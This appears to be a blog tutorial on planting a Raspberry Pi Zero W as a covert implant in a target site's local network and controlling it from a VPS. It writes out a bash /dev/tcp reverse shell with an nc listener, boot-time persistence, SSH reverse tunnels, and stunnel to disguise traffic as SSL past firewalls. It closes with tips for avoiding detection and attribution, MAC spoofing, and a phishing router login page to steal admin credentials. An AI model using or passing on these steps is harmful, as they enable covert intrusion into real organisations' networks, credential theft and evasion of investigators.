HomePostsInfiltration in local network on site with Raspberry Pi W zero (creating tunnel)
December 21, 2018
Infiltration in local network on site with Raspberry Pi W zero (creating tunnel)
In this post I will
describe you how you can infiltrate in some local network by using
hardware implant as Raspberry Pi. This is very useful if you want to
perform attack on site e.g. company, shopping center, hospital,
school, etc. The goal is to install small hardware as Raspberry Pi,
which would allow us to connect in local network and perform attack
You can use different models as Raspberry Pi 2, 3 or W zero. Raspberry Pi 3 allow connection on network over wifi or over port RJ45, while for example Raspberry Pi W zero allow you connection only over wifi. But Raspberry Pi W zero is a lot of smaller, cheaper (only 10$) and less power consumption. Less power consumption is also advantage, if you during attack do not have any power socket and you need to power it with battery. It will last longer.
For the purpose of
this post I will use Raspberry Pi W zero.
In the further text
I will show you how to prepare Raspberry Pi W zero for attack and how
to tunnel all traffic from Pi to the VPS server. After that we will
be able to connect on VPS server over SSH protocol and control
I will show you three different ways to perform tunneling. Over TCP protocol, SSH protocol and SSH/SSL tunnel. TCP protocol is technical the easiest way, while SSH and SSH/SSL is a lit bit harder. But do not be afraid it is not a rocket science.
2. Preparing of Raspberry Pi W zero
2.1. Burning Kali
Linux on SD card
If you already have
installed Kali Linux on your Pi you can skip this paragraph.
I downloaded Kali Linux image by Re4son, from the following link, but you can also download from official site:
The I used Win32DiskImager to write .img file to the SD card. It will create two partitions on SD card. Be aware that one of partition is formatted in EXT4, so you can not see/read it on windows machine.
2.2. Setup wifi to connect on network at boot up
Now we will set up
wifi settings, that each time we boot the Raspberry Pi W zero, it
will automatically connect to the wifi. Take a note that you will
need wifi credentials. You can also connect it over ethernet
connector, but in this case you need additionally micro usb ethernet
connector, while if you use Raspberry Pi 3 it already have it build
For this setup you
will need to plug SD card in any Linux machine.
Brows for the file /etc/network/interfaces and add following commands:
iface wlan0 inet
iface default inet dhcp
Next in the file /etc/wpa_supplicant/wpa_supplicant.conf add:
2.3. Allow SSH server to start at boot
To automatically enable SSH connection on the Raspberry Pi add the following line in /etc/rc.local :
sudo /etc/init.d/ssh start
it. As soon as we turn on Raspberry Pi W zero it will automatically
boot and start the SSH server. Due to we also set up wifi connection
on boot up, we can connect it on Raspberry Pi over SSH by following
command and default password toor:
ssh root@<Raspberry Pi IP>
find Raspberry Pi W zero’s address we can perform simple scan of
don not forget to to change default password after first boot
Preparing of VPS server
the purpose of this post I created VPS server (Ubuntu) on digitalocen
(digitalocean.com). During the setup I added SSH public key, so I can
connect on server with my Linux machine over SSH protocol. That’s
4. Approach 1 – create tunnel with TCP protocol
is the easiest way to create tunnel between Raspberry Pi W zero and
VPS server and consequently you can control Pi over the server.
need only one line command on both, Raspberry Pi W zero and VPS
On Raspberry Pi W zero: bash -i >& /dev/tcp/<VPS server IP>/5555 0>&1
On VPS server: nc -vv -l -p 5555
Of course, because during the site attack we do not have hooked up monitor and keyboard on our Raspberry Pi W zero, so we need to create that this necessary command will run as soon as we hook up power in Raspberry Pi w zero. For this reason we will create service, which will do heavy weighting for us.
4.1. Set up service on Raspberry Pi
First, we will create bash file (I named it service.sh) and save it in folder etc/systemd/system :
-i >& /dev/tcp/<VPS server IP>/5555 0>&1
Then we will create service file (I named it system.service) and saved in the same folder etc/systemd/system:
script with systemd
Then set permissions for both newly created files:
Start the service:
And for the last, enable service to start each time at boot up:
Now reboot Raspberry Pi W zero and try to connect it on from VPS server with following command:
-vv -l -p 5555
the whole “magic”. Now you can control Raspberry Pi W zero
connected in any network (of course if you have wifi password and
physical access to the victim network). Now anytime we lose
connection for any reason, the Raspberry Pi will connect back on VPS
I would use this approach, when I know that attacking site does not have any system admin and does not put much effort to security. You need to know that TCP traffic is not encrypted so it would be easily captured and detected.
So in the further text I will show you a lit bit secured approach by using SSH protocol. Once a connection between Raspberry Pi W zero and VPS server is established, the data that is transmitted between them is encrypted.
5. Approach 2 – create tunnel with SSH protocol
this purpose we need to create key-based authentication, which will
enable us to obtain SSH connection between Raspberry Pi W zero and
On the Raspberry Pi W zero, we will use ssh-keygen, which will create public and private key:
-f ~/.ssh/vps -t rsa -N ”
Copy the output of public key (in this case the public key is vps) and paste their content into authorized_keys in the /root/.ssh directory on the VPS server and restart the ssh service:
just try to connect Raspberry Pi W zero with the VPS server over SSH
with following command, to see if the protocol works fine:
root@<VPS server IP>
If you successfully connected on the VPS server, that everything works fine. So you can disconnect it with command exit.
since SSH protocol is setup correctly we can tunnel all connection
from Raspberry Pi to the VPS server by running following commands:
On Raspberry Pi W zero: ssh -i /root/.ssh/vps -nNT -R 5555:localhost:22 <server IP>
And again as in previous approach, we need to somehow start that command on Raspberry Pi W zero at the boot up. For this purpose we can use the same way as we did in the approach 1 by creating service (paragraph 4.1.). After you done it, reboot the Raspberry Pi W zero and run the ssh root@localhost -p 5555 on the VPS server. You should get shell which you will enable to command the Raspberry Pi remotely.
Now, since we went through two different tunneling approaches (TCP
and SSH protocol) I will will briefly explain you, why I included
next approach (SSH/SLL) in this post.
Lets imagine that we will attack some big company, which has also IT department with system admins with some sort of IDS, IPS and FW to do deep packet inspections, regular scanning, etc. In that kind of companies networks are usually blocking ports 22. Also if you do SSH over e.g. port 443, their systems would identify it and drop the traffic. This is the reason why I choice stunnel, so I can tunnel SSH connection that will looks like SSL traffic. We will establish SSL tunnel over port 443, so it will looks like normal SSL traffic and consequently FW will permit the traffic. Enough of my briefing words, let’s do it.
6. Approach 3 – create tunnel with SSH/SSL
First of all we need to generate private and public key on Raspberry Pi W zero and put the public key on the VPS server, as we did in previous approach (SSH). So I will not write it down again, due to doubling of text and work.
Next we need to install some prerequisites first.
Set up Raspberry Pi W zero
apt-get install stunnel4
apt-get install autossh
After that, we need to create stunnel configuration /etc/stunnel/stunnel.conf file and add following:
accept = 443
connect = <VPS
We need to ensure that tunnel will automatically start. Add the following in /etc/default/stunnel4 file:
Then, we need to enable that Raspberry Pi W zero will be automatically establish the SSH tunnel when network interface comes up, by creating the file /etc/network/if-up.d/autossh. Add the following:
After that, we need to create stunnel configuration file /etc/stunnel/stunnel.conf and add following:
pid = /var/run/stunnel.pid
cert = /etc/stunnel/stunnel.pem
accept = 443
connect = 127.0.0.1:22
We need to ensure that tunnel will automatically start and listen the port 443. Add the following in /etc/default/stunnel4 file:
For the end reboot VPS server.
That’s it. To get control over the Raspberry Pi W zero run the following on the VPS server:
ssh -p 5555 root@localhost
Finally, I explained you three different ways how you can control Raspberry Pi W zero remotely over the VPS server and consequently control it from anywhere on the world. My recommendation is to stick to the last SSH/SSL approach in every case.
I hope that you will use it only in educational purpose and you will
not use it for illegal shits. But anyway I will give you additionally
tips how to avoid detection. But remember this will not protect you
100%, there is always the way to track you down. Ok, if yo really
want to hide traces you should never buy VPS server with real ID and
pay it with credit card. There is plenty VPS’s which you can buy
with bitcoin. Next, never connect to the VPS server from the home. Go
to the public place and connect from there. For connection on the VPS
use freshly installed virtual machine and after making some noise
delete it. Be aware that any public cam do not catch you, left your
phone at home and pray to the god that they will not catch you :).
Ok, I will add also some additional tips for serious penetration
testers. If we try to attack some big, serious company with
infiltration of Raspberry Pi in their network, it is just a question
of time when the gadget will be noticed. Why? Ok, every serious
system admin will perform regular scanning/mapping of the network.
And as soon as they will run the e.g. nmap he will notice the new
hardware with the name Raspberry Pi. And the game is over. So, I
strongly recommend you to spoof the mac address. Check for common
vendors mac addresses and use it. For example, I would spoof my
Raspberry Pi with Cisco router mac address. And I would also host web
as default router login page on my Raspberrry Pi, and also set this
page as phishing. So at the end it would looks like it is a real and
legit router. And if you will have luck some “noob” admin would
try to login on it. That would be the pure win for penetration
Maybe it is also smart move to take on the audit two pieces of Raspberry Pi. One is spoofed as router and one as e.g. printer. Just in case if they detect you and shutdown one of your gadgets.
I also recommend you that you do not run the VPS server as root. In case if your Raspberry Pi would be detected, they can copy the private key from the SD card and use that key to pawn your VPS very easily.
There is also many other useful tips, but I will left it for some other opportunities. The conclusion is anyway already to long :).